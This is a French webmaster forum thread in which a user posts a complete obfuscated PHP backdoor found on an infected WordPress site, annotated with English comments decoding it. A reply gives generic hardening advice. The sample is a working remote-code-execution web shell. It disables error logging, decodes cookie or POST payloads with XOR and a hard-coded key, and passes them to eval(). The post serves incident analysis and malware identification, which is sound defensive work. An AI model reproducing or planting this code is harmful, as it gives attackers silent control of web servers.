Malware sur Wordpress !

WRInaute impliqué
Bonjour,
J'ai un site hébergé sur une offre mutualisée WordPress. Deux à trois fois par an, mon site est infecté : je trouve dans le FTP des fichiers qui envoient des e-mails en masse (un peu partout dans les modules, les fichiers WordPress, etc.).
Voici le type de code que contiennent ces fichiers malveillants :

Code:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['x71a2d93'] = "\x43\x9\x71\x40\x2c\x36\x2b\x7d\x27\x70\x73\x60\x45\x7b\x58\x2a\x5b\x21\x28\x33\x5f\x6d\x4b\x20\x34\x3b\x22\x26\x6a\x79\x59\x77\x4f\x44\x67\x35\x54\x25\x2e\x69\x39\x4e\xd\x32\x4c\x62\x3d\x63\x7e\x66\x65\x41\x57\x49\x24\x31\x50\x68\x3a\x7c\x7a\x46\x6c\x5e\x75\x2d\x48\x5d\x30\x78\x53\x56\x5a\x5c\x6e\x3c\x3f\x4d\x55\x72\x42\x37\x4a\x51\x76\x47\x23\x52\x2f\x29\x38\x6b\x61\x64\xa\x6f\x74\x3e";
// ANALYSIS NOTES (sample kept byte-for-byte; only comments added).
// Setup section of an obfuscated PHP backdoor. The first line writes a
// 98-character lookup table into $GLOBALS['x71a2d93'] ("\x47\x4c\x4fB\x41\x4c\x53"
// is the hex-escaped string "GLOBALS"). Every later string in the file is
// spelled by concatenating single characters picked from that table by index,
// so no function name or key appears in clear text.
// Nothing in this file sends mail itself: further down it evaluates PHP code
// received in a request, so any mass-mailing is done by code delivered later.
// Indicators visible in this sample that a defender can search for: the
// hex-escaped "GLOBALS" variable-variable above, long chains of
// $GLOBALS['...'][n] concatenations, error logging being switched off, and an
// eval() applied to a value derived from cookie or POST data.
// NOTE(review): removing this one file does not close the way it was written
// to disk; the entry point has to be found separately.

// $GLOBALS['s1c96999'] = 'chr'
$GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]] = $GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][79];
// $GLOBALS['h44f23'] = 'ord'
$GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]] = $GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][93];
// $GLOBALS['t7f80c'] = 'strlen'
$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][74];
// $GLOBALS['q953fb7c'] = 'ini_set'
$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96];
// $GLOBALS['u2c2'] = 'serialize'
$GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
// $GLOBALS['n02a2'] = 'phpversion'
$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74];
// $GLOBALS['p14b2670'] = 'unserialize'
$GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
// $GLOBALS['k1cdf1c'] = 'base64_decode'
$GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50];
// $GLOBALS['o7024'] = 'set_time_limit'
$GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][96];
// $GLOBALS['h1ace7667'] = 'q1bd628' (the two-pass XOR wrapper defined in this file)
$GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]] = $GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][90];
// $GLOBALS['n33d10e8'] = 'ucda1dd65' (the XOR routine defined in this file)
$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][35];
// $GLOBALS['r9f05ad4'] = copy of the request's POST fields
$GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] = $_POST;
// $GLOBALS['ic0da'] = copy of the request's cookies
$GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] = $_COOKIE;
// ini_set('error_log', NULL): clears the error-log destination. The leading @
// on this and the next three calls silences any warning they raise.
@$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34], NULL);
// ini_set('log_errors', 0): turns error logging off for this request, so the
// payload's failures leave no trace in the PHP error log.
@$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10], 0);
// ini_set('max_execution_time', 0): removes the script time limit.
@$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50], 0);
// set_time_limit(0): same effect through the function call.
@$GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]](0);

// Payload ($hadb04790) and the name of the field that carried it ($j1b154b2);
// both are filled from the request further down.
$hadb04790 = NULL;
$j1b154b2 = NULL;

// $GLOBALS['sa68'] = a hard-coded 36-character, UUID-formatted string. It is
// used later both as an XOR key and as the value the decoded request must
// present before any command is honoured, i.e. it is the operator's secret.
$GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][24];
// Binds $sa68 to the global of that name when this file is included from
// inside a function; at file scope the statement has no effect.
global $sa68;

/**
 * Repeating-key XOR used by this malware sample to decode request payloads.
 *
 * The three indirect calls resolve, through the character table and aliases
 * set at the top of the file, to strlen() ('t7f80c'), chr() ('s1c96999') and
 * ord() ('h44f23').
 *
 * @param string $hadb04790 Data to transform.
 * @param string $r4e7      Key; it is reused from its first byte each time
 *                          its end is reached.
 * @return string Each data byte XORed with the matching key byte.
 */
function ucda1dd65($hadb04790, $r4e7)
{
    $u9b4c = "";

    // The outer loop has no increment of its own: the data index $vd66f6 is
    // advanced only by the inner loop. With an empty key the inner loop never
    // runs, so non-empty data would keep this loop spinning.
    for ($vd66f6=0; $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790);)
    {
        // One pass over the key ($da2388), stopping early if the data runs out.
        for ($da2388=0; $da2388<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($r4e7) && $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790); $da2388++, $vd66f6++)
        {
            // chr(ord(data byte) ^ ord(key byte))
            $u9b4c .= $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($hadb04790[$vd66f6]) ^ $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($r4e7[$da2388]));
        }
    }

    return $u9b4c;
}

/**
 * Two-pass XOR wrapper used by this malware sample.
 *
 * The lookup key spelled from the character table is 'n33d10e8', which the top
 * of the file aliases to ucda1dd65(), the repeating-key XOR routine. The data
 * is XORed first with the global $sa68 (the hard-coded secret) and the result
 * is XORed again with $r4e7.
 *
 * @param string $hadb04790 Data to transform.
 * @param string $r4e7      Second XOR key supplied by the caller.
 * @return string The doubly XORed data.
 */
function q1bd628($hadb04790, $r4e7)
{
    global $sa68;

    // ucda1dd65(ucda1dd65($hadb04790, $sa68), $r4e7)
    return $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($hadb04790, $sa68), $r4e7);
}

// Request handling of the backdoor. Lookup keys below are spelled from the
// character table in $GLOBALS['x71a2d93']; the decoded names are given in the
// comments so the control flow can be followed without executing the sample.

// $GLOBALS['ic0da'] is the copy of the request cookies taken at the top of the
// file. The loop overwrites on every pass, so the LAST cookie wins: its value
// becomes the payload and its name becomes the second XOR key.
foreach ($GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] as $r4e7=>$ccfa5)
{
    $hadb04790 = $ccfa5;
    $j1b154b2 = $r4e7;
}

// No usable cookie value: fall back to the POST fields ($GLOBALS['r9f05ad4']),
// again keeping only the last field.
if (!$hadb04790)
{
    foreach ($GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] as $r4e7=>$ccfa5)
    {
        $hadb04790 = $ccfa5;
        $j1b154b2 = $r4e7;
    }
}

// unserialize(q1bd628(base64_decode($hadb04790), $j1b154b2)): the payload is
// base64-decoded, XORed with the hard-coded secret and then with the field
// name, and the result is unserialized. The @ hides the warning raised when
// an ordinary visitor's cookie does not decode to serialized data.
$hadb04790 = @$GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]]($GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]]($hadb04790), $j1b154b2));
// Gate: the decoded array must carry key 'ak' equal (loose ==) to $sa68, the
// hard-coded secret. Requests that fail this check fall through silently and
// the script produces no output of its own.
if (isset($hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]]) && $sa68==$hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]])
{
    // Command field 'a' == 'i': report back. Replies with
    // serialize(['pv' => phpversion(), 'sv' => '1.0-1']).
    if ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][39])
    {
        $vd66f6 = Array(
            $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84] => @$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]](),
            $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][84] => $GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][38].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][55],
        );
        echo @$GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]]($vd66f6);
    }
    // Command field 'a' == 'e': execute.
    elseif ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][50])
    {
        // NOTE(review): code-execution sink. Field 'd' of the decoded request
        // is run as PHP with the web server account's privileges. This is what
        // makes the file a remote-code-execution backdoor; whatever the site
        // was seen doing (e.g. bulk mail) comes from code delivered here, which
        // is not stored in this file.
        eval($hadb04790[$GLOBALS['x71a2d93'][93]]);
    }
    // Authenticated requests stop here, so the page the file was planted in is
    // not rendered after a command has been served.
    exit();
}

Avez-vous une idée du type de malware dont il s'agit et de sa provenance ?
Merci
 
Membre Honoré
Bonjour,

Il faudrait vérifier le site (URL), habituellement c'est un problème de plugin.
Sinon avoir le WordPress à jour, ainsi que les modules est habituellement suffisant.
Vous pouvez vérifier aussi les autres sites que vous hébergez via le même espace.

N'hésitez pas entre deux messages à présenter aussi vos avis sur les sujets du forum :
https://www.webrankinfo.com/forum/f/demandes-davis-et-de-conseils-sur-vos-sites.36/
pour aider les autres personnes de la communauté d'entraide.

Cordialement.
 